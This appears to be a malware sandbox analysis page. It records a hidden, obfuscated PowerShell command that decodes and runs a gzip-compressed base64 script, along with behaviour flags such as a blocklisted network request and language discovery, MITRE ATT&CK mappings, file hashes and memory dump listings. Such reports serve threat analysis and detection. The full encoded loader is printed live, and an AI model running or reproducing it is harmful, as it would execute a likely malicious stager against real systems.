      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIADQy7GYCA7VWbW/aSBD'+'+Xqn/waqQbKsEG8KlTaRKtzavLRATBwhw6LSx{1}3vD2kvsdQjp9b/frMEJvSa93Em{0}lLAvM7Ozzzwzs8ss9gTlsZJUla9v3yj7z8EJjhStdH/jlZXSXQ2H+tNm6bY2vVU+KdocrdcNHmEaL87O7CxJSCx280qbCJSmJLpmlK'+'SarvylTEKSkKPz6xviCeWrUvqz'+'0mb8GrO92NbGXkiUIxT7cq/HPSz9qrhr'+'RoWm/vGHqs+PqotK8zbDLNVUd5sKElV8xlRd+abLAy+3a6KpfeolPOVLUZnQ+LhWGcUpXpIBWLsjfSJC7qcqXObpOgkRWRLvbiXN7IQ0{1}YZOwj3k+wlJU7WszOUB88Xid22+P/0iiwWNSKUbC5LwtUuSO+qRtNLBsc/IBVkuQMsVCY2Dha6D2B{0}fEa0UZ4yVlf9iRhuQTYHda5W0QyWQckSilyGmz9yzz/2MkZ2m+oyjkgc6fAUXAL9vEsJlwR78UBsNnyHQ00LxzfMdAj5rDk9prv{0}JMctKH'+'07HgidbmJYuk4zoi0fElZJ/0yi/{0}li{0}0AS9tNnensDafMypv3iy8B0DStwZ9KTQy3xukCWNSWMb44h6BWW{0}58JClozko{1}QKsQG4qKn7DeI3CCMB{1}hJoyY4f{0}JoR{1}Y+6VkaZTxLkQWhT8Aqirn/v'+'zC52mtqN+yQC+HZzoGtpCYlCCul9cmyL0+Uch{1}Sb4TQtK04GmQq57hLMi{1}9WUJzS/RbKBM+H6pO7/YwJ6u{1}U{1}OYW+j/g3B9r8zgVSeZBYAGCS3dNPIqZRKSsdKhPrK{0}Lg+'+'J49V'+'k8bMwYJBBYuoN4wIrEwRWSLgl4KqmhV{0}wiutG'+'akQhE8sLRYjiAMrHPkpxeOCC++oKfRTLsmC+BKRA58BKi7TIuysqYJgLKkAQ5J9j/8eLHApS7YydkHx2tyLK5tRUyC0rLKG'+'fpHqIckEQAGK2ERxZOyUl9V2u0d8Y5dRB800bHnXW{1}2+/Gj{1}a7ffgb9Zfvex4NHGHyqO/ZqdNufUR0E2y8jwPk+Z99cuqO68JtdoXtoM6QmlY99CzzUo6rQUDNYDpCncvQY6bTjHqDbnpvbDoTaWtnw6vXO{0}cmOj6unx+bK4BvCnor5A8iurnvwRiK6nnP6qaW2WXNz/b{1}9aTWmk{0}Yx6i3wuWEp+7JtGEYxqmPG/0tQhb3j/vbq+o{1}v+x4kVWPuX{1}q{0}{0}'+'eoiZAdN8cti3+ZWglyjDEO{0}nziTbDfDmxkndiUzIajljUctiw0at/cNk6NwDidXOHQmoxrdLa+ughh3tp0hl8Ms97{0}yQOfbQC4Nkc4uACZwK554RJkGu+R9X7A0xpeWRxZINOa3aJ2O{1}23HAb7l6MaR2M2uMKoN9u2DKM6deqoY/JJO0BDEMeBNcQo'+'vWs8NIzq2Of+5LfBdGmMr9gHo2EPnfBK3tlYR/L/ptP44s2qG+/8w8fehI4jjkaGMX4HnJiPaCyOa4sSbZ6cS0KYb9+U+H{0}2QI2XekMfJ2mIGVA'+'Gin6Rui2'+'etPZ{0}3O{1}Uamgav'+'AZWJIkJgwYKLbYgPGKMe7KJ7Oo9dLBdX5{1}tb'+'tTNvXpupCuPgvpTdymWzs5m4KSsV{0}Gv0i'+'NxIMKyeX9'+'smtAUzHuznufK629m8/VWk7bKsqtIYPamWW4arNGlomm/Gip4OggoYD8B6yXc4OgVVByogLsqINGzOGeH2O2u9ciEA+QAsircey5fDTuGgIEjcquUhOyphz269GB3fyVp9qUshB//X0n'+'ztPaT'+'3VcRySzn6Pyw+v3CQR/4ZQBMMBUg50JJZmT3THgBh32eHAQYYgNZsNx/8g{1}9nomjATzI8q7wN/0G2pC4CwAA')-f'1','F')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2644

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UFPAUYDUHBUG2QKQV8J8.temp

Filesize
7KB

MD5
35fabe68aa5d1f38aaa25d095921551f

SHA1
64c2b30c1cb57c6b6372ea9c1d2f39d4b93b149f

SHA256
098a3feebf749df0a4111777432f6a0c6ec9352b6ce904e457a68543885b9528

SHA512
ff7c4e4bcb546ff43d5539959be808ab560e152532e8a7497f80692c67adf9ca7c9d177b38bf74b7a16c5038a12a0d95578a48d949608d9a368ffa458921040d

Download Submit
memory/2644-15-0x0000000002AE0000-0x0000000002AE1000-memory.dmp

Filesize
4KB

Download
memory/3008-4-0x000007FEF594E000-0x000007FEF594F000-memory.dmp

Filesize
4KB

Download
memory/3008-5-0x000000001B640000-0x000000001B922000-memory.dmp

Filesize
2.9MB

Download
memory/3008-6-0x00000000027A0000-0x00000000027A8000-memory.dmp

Filesize
32KB

Download
memory/3008-7-0x000007FEF5690000-0x000007FEF602D000-memory.dmp

Filesize
9.6MB

Download
memory/3008-8-0x000007FEF5690000-0x000007FEF602D000-memory.dmp

Filesize
9.6MB

Download
memory/3008-11-0x000007FEF5690000-0x000007FEF602D000-memory.dmp

Filesize
9.6MB

Download
memory/3008-12-0x000007FEF5690000-0x000007FEF602D000-memory.dmp

Filesize
9.6MB

Download
memory/3008-10-0x000007FEF5690000-0x000007FEF602D000-memory.dmp

Filesize
9.6MB

Download
memory/3008-9-0x000007FEF5690000-0x000007FEF602D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing